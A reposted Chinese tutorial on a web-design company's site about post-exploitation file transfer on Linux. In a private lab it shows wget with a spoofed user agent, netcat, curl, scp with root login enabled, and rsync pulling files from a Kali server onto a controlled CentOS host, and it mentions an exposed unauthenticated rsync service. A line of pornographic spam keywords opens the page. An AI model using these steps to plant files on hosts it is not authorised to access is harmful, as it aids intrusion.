真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

linux后滲透系列之怎么下載文件

這篇文章主要介紹“l(fā)inux后滲透系列之怎么下載文件”,在日常操作中,相信很多人在linux后滲透系列之怎么下載文件問(wèn)題上存在疑惑,小編查閱了各式資料,整理出簡(jiǎn)單好用的操作方法,希望對(duì)大家解答”linux后滲透系列之怎么下載文件”的疑惑有所幫助!接下來(lái),請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧!

站在用戶的角度思考問(wèn)題,與客戶深入溝通,找到惠安網(wǎng)站設(shè)計(jì)與惠安網(wǎng)站推廣的解決方案,憑借多年的經(jīng)驗(yàn),讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合,創(chuàng)造個(gè)性化、用戶體驗(yàn)好的作品,建站類型包括:成都網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、主機(jī)域名、網(wǎng)頁(yè)空間、企業(yè)郵箱。業(yè)務(wù)覆蓋惠安地區(qū)。

準(zhǔn)備工作

首先需要架設(shè)服務(wù)器,將要下載的文件部署在服務(wù)器上,筆者用的服務(wù)器為Kali Linux架設(shè),ip地址是192.168.8.111,被控端是Centos,ip地址是192.168.8.112

linux后滲透系列之怎么下載文件

服務(wù)器端架設(shè)完成,后文會(huì)演示Linux許多的下載方法。

下載文件

Wget

用于從網(wǎng)絡(luò)上下載文件的一個(gè)工具(Linux自帶,Windows需要去官網(wǎng)下載安裝,與我們下載直接違背,所以Windows篇并沒有提)

使用方法:

第一種——普通下載

wget http://192.168.8.111/test/test.txt

linux后滲透系列之怎么下載文件

第二種——偽造UA下載

首先來(lái)看一下正常下載的UA

linux后滲透系列之怎么下載文件

刪掉test.txt文件重新下載,輸入命令:

wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" http://192.168.8.111/test/test.txt

linux后滲透系列之怎么下載文件

然后再查看Kali Linux的Wireshark捕獲的數(shù)據(jù)包

linux后滲透系列之怎么下載文件

可以看到成功修改掉UA,其實(shí)wget還有許多功能,不過(guò)對(duì)于被控機(jī)進(jìn)行下載不需要太多方式,只需要簡(jiǎn)單的下載即可,而且wget只有后臺(tái)下載時(shí)才會(huì)產(chǎn)生日志文件,可以說(shuō)是Linux中的一個(gè)下載神器

NC

NetCat,功能很多就不介紹了,簡(jiǎn)要寫下如何通過(guò)NC進(jìn)行下載

使用方法:

Kali Linux端輸入命令:nc -lvp 8888 < test.txt

linux后滲透系列之怎么下載文件

Centos端輸入命令:

nc 192.168.8.111 8888 > test.txt

linux后滲透系列之怎么下載文件

會(huì)顯示空白,其實(shí)已經(jīng)傳輸完成了,另起終端就可以查看

linux后滲透系列之怎么下載文件

然后只需要終端nc就可以了,在Kali Linux端可以看到傳輸

linux后滲透系列之怎么下載文件

Curl

利用URL語(yǔ)法在命令行下工作的文件傳輸工具

使用方法:

Centos端輸入命令:curl -O http://192.168.8.111/test/test.txt(注意:大寫的o)

linux后滲透系列之怎么下載文件

可以看到下載成功,curl的功能如同wget一樣,也可以進(jìn)行修改UA,這里就不再演示

SSH

建立在應(yīng)用層基礎(chǔ)上的安全協(xié)議,專為遠(yuǎn)程登錄會(huì)話和其他網(wǎng)絡(luò)服務(wù)提供安全性的協(xié)議

本次需要用到的是scp命令,scp是基于SSH登錄進(jìn)行安全的遠(yuǎn)程文件拷貝,所以需要確保SSH服務(wù)是正常運(yùn)行的

輸入命令:

service sshd start

linux后滲透系列之怎么下載文件

可以看到是正常運(yùn)行狀態(tài)

使用方法:

第一種——本地復(fù)制到遠(yuǎn)程

在Kali Linx端輸入命令:

scp /var/www/html/test/test.txt root@192.168.8.112:/root

linux后滲透系列之怎么下載文件

第一次連接會(huì)詢問(wèn)無(wú)法檢測(cè)遠(yuǎn)程主機(jī)的真實(shí)性,是否需要繼續(xù)連接,輸入yes即可,往后再次連接就不會(huì)詢問(wèn)

linux后滲透系列之怎么下載文件

第二種——將遠(yuǎn)程文件復(fù)制到本地

如果用Kali Linux做服務(wù)器的話,首先需要修改下配置文件(默認(rèn)Kali Linx中SSH登錄是禁用root用戶的),輸入命令:

vim /etc/ssh/sshd_config,添加一條PermitRootLogin yes

linux后滲透系列之怎么下載文件

然后重啟服務(wù)即可

linux后滲透系列之怎么下載文件

然后在Centos端輸入命令:

scp root@192.168.8.111:/var/www/html/test/test.txt /root

linux后滲透系列之怎么下載文件

Rsync

Rsync是Linux系統(tǒng)中一個(gè)鏡像備份工具,可以遠(yuǎn)程同步,文件復(fù)制,默認(rèn)系統(tǒng)自帶且運(yùn)行

使用方法:

第一種——遠(yuǎn)程同步

在Kali Linux端輸入命令:

rsync -r /var/www/html/test (Kali Linux的目錄)192.168.8.112:/var/www/html/(遠(yuǎn)程主機(jī)被同步的目錄)

linux后滲透系列之怎么下載文件

在Centos端查看同步的目錄

linux后滲透系列之怎么下載文件

可以看到整個(gè)目錄都進(jìn)行了同步

第二種——利用SSH

Kali Linux輸入命令:

rsync -av test.txt -e  ssh root@192.168.8.112:/root

linux后滲透系列之怎么下載文件

-e選項(xiàng)可以指定命令,所以說(shuō)實(shí)際上是用SSH做的傳輸

linux后滲透系列之怎么下載文件

有趣的是Rsync還可以列出遠(yuǎn)程主機(jī)的目錄,命令為:rsync 192.168.8.112:/var/www/html/,筆者曾在某項(xiàng)目駐場(chǎng)遇到過(guò)一臺(tái)主機(jī)未授權(quán)訪問(wèn)Rsync,甚至可以直接進(jìn)行同步,拿到一個(gè)高危

到此,關(guān)于“l(fā)inux后滲透系列之怎么下載文件”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章!


網(wǎng)站名稱:linux后滲透系列之怎么下載文件
標(biāo)題鏈接:http://weahome.cn/article/jogpoo.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部